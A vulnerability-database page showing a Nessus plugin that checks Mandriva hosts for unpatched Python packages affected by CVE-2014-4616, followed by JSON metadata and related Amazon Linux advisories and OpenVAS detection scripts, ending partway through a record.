Mandriva Linux Security Advisory : python (MDVSA-2014:135)
2014-07-11T00:00:00
ID MANDRIVA_MDVSA-2014-135.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 Tenable Network Security, Inc. Modified 2021-01-06T00:00:00
Description
Updated python and python-simplejson package fixes security vulnerability
Python are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).
This issue also affected the python-simplejson package, which has been patched to fix the bug.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2014:135.
# The text itself is copyright (C) Mandriva S.A.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(76471);
script_version("1.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2014-4616");
script_bugtraq_id(68119);
script_xref(name:"MDVSA", value:"2014:135");
script_name(english:"Mandriva Linux Security Advisory : python (MDVSA-2014:135)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Mandriva Linux host is missing one or more security
updates."
);
script_set_attribute(
attribute:"description",
value:
"Updated python and python-simplejson package fixes security
vulnerability
Python are susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used an an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
This issue also affected the python-simplejson package, which has been
patched to fix the bug."
);
script_set_attribute(
attribute:"see_also",
value:"http://advisories.mageia.org/MGASA-2014-0285.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://advisories.mageia.org/MGASA-2014-0286.html"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64python-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64python2.7");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python-docs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python-simplejson");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:tkinter");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:tkinter-apps");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:business_server:1");
script_set_attribute(attribute:"patch_publication_date", value:"2014/07/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/07/11");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.");
script_family(english:"Mandriva Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
flag = 0;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"lib64python-devel-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"lib64python2.7-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"python-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", reference:"python-docs-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"python-simplejson-2.3.3-2.1.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"tkinter-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"tkinter-apps-2.7.3-4.7.mbs1")) flag++;
if (flag)
{
if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());
else security_note(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "MANDRIVA_MDVSA-2014-135.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:135)", "description": "Updated python and python-simplejson package fixes security vulnerability\n\nPython are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been patched to fix the bug.", "published": "2014-07-11T00:00:00", "modified": "2021-01-06T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/76471", "reporter": "This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.", "references": ["http://advisories.mageia.org/MGASA-2014-0286.html", "http://advisories.mageia.org/MGASA-2014-0285.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616"], "cvelist": ["CVE-2014-4616"], "immutableFields": [], "lastseen": "2022-04-16T14:07:40", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2014-374", "ALAS-2014-380"]}, {"type": "centos", "idList": ["CESA-2015:2101"]}, {"type": "cve", "idList": ["CVE-2014-4616"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-4616"]}, {"type": "fedora", "idList": ["FEDORA:096D7228ED", "FEDORA:4FCC221CAB", "FEDORA:79A3360CE877", "FEDORA:AE30560F3A00", "FEDORA:E272360D99E0", "FEDORA:F219C21A3D"]}, {"type": "gentoo", "idList": ["GLSA-201503-10"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "ibm", "idList": ["6599DC93FFCF552D50A8FC9F31B71D111EC8AFA95F2B494C03ED7610CB908101", "A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-374.NASL", "ALA_ALAS-2014-380.NASL", "CENTOS_RHSA-2015-2101.NASL", "EULEROS_SA-2019-1434.NASL", "FEDORA_2014-14208.NASL", "FEDORA_2014-14245.NASL", "FEDORA_2014-14257.NASL", "FEDORA_2014-7772.NASL", "FEDORA_2014-7800.NASL", "FEDORA_2014-8035.NASL", "GENTOO_GLSA-201503-10.NASL", "MANDRIVA_MDVSA-2015-075.NASL", "MANDRIVA_MDVSA-2015-076.NASL", "OPENSUSE-2014-458.NASL", "ORACLELINUX_ELSA-2015-2101.NASL", "REDHAT-RHSA-2015-2101.NASL", "SL_20151119_PYTHON_ON_SL7_X.NASL", "UBUNTU_USN-2653-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120402", "OPENVAS:1361412562310120575", "OPENVAS:1361412562310121364", "OPENVAS:1361412562310122760", "OPENVAS:1361412562310122870", "OPENVAS:1361412562310842261", "OPENVAS:1361412562310867929", "OPENVAS:1361412562310867978", "OPENVAS:1361412562310867987", "OPENVAS:1361412562310868464", "OPENVAS:1361412562310868482", "OPENVAS:1361412562310871501", "OPENVAS:1361412562311220191434"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1064", "ELSA-2015-2101"]}, {"type": "redhat", "idList": ["RHSA-2015:1064", "RHSA-2015:2101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867"]}, {"type": "ubuntu", "idList": ["USN-2653-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-4616"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2014-374"]}, {"type": "centos", "idList": ["CESA-2015:2101"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-4616"]}, {"type": "fedora", "idList": ["FEDORA:4FCC221CAB"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "ibm", "idList": ["A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27"]}, {"type": "nessus", "idList": ["FEDORA_2014-7772.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121364"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1064"]}, {"type": "redhat", "idList": ["RHSA-2015:2101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867"]}, {"type": "ubuntu", "idList": ["USN-2653-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-4616"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "76471", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:135. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76471);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"MDVSA\", value:\"2014:135\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:135)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python and python-simplejson package fixes security\nvulnerability\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0286.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-simplejson-2.3.3-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.7.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "cpe": ["p-cpe:/a:mandriva:linux:lib64python-devel", "p-cpe:/a:mandriva:linux:lib64python2.7", "p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python-simplejson", "p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:tkinter-apps", "cpe:/o:mandriva:business_server:1"], "solution": "Update the affected packages.", "nessusSeverity": "Low", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2014-07-10T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}
{"amazon": [{"lastseen": "2021-09-27T19:39:49", "description": "**Issue Overview:**\n\nIt was <a href=\"http://bugs.python.org/issue21529\"</a>reported</a> that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n<i>The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.</i>\n\n \n**Affected Packages:** \n\n\npython-simplejson\n\n \n**Issue Correction:** \nRun _yum update python-simplejson_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686 \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-07-09T16:51:00", "type": "amazon", "title": "Low: python-simplejson", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-09-19T10:47:00", "id": "ALAS-2014-374", "href": "https://alas.aws.amazon.com/ALAS-2014-374.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-27T19:39:45", "description": "**Issue Overview:**\n\nIt was <a href=\"http://bugs.python.org/issue21529\">reported</a> that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n<i>The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.</i>\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 python27-tools-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-test-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-debuginfo-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-libs-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-devel-2.7.5-13.35.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 python27-tools-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-libs-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-test-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-devel-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-debuginfo-2.7.5-13.35.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-07-23T13:53:00", "type": "amazon", "title": "Medium: python27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-09-19T10:51:00", "id": "ALAS-2014-380", "href": "https://alas.aws.amazon.com/ALAS-2014-380.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-03-17T23:01:24", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120575", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120575\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:53 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-374)\");\n script_tag(name:\"insight\", value:\"It was\");\n script_tag(name:\"solution\", value:\"Run yum update python-simplejson to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson-debuginfo\", rpm:\"python-simplejson-debuginfo~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson\", rpm:\"python-simplejson~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-17T23:01:12", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120402", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120402\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:25:33 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-380)\");\n script_tag(name:\"insight\", value:\"It was reported that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process's arbitrary memory.Quoting the upstream bug report:The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.The bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code. Internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.\");\n script_tag(name:\"solution\", value:\"Run yum update python27 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-380.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python27-tools\", rpm:\"python27-tools~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27\", rpm:\"python27~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-test\", rpm:\"python27-test~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-debuginfo\", rpm:\"python27-debuginfo~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-libs\", rpm:\"python27-libs~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-devel\", rpm:\"python27-devel~2.7.5~13.35.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2014-7800", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2019-03-15T00:00:00", "id": 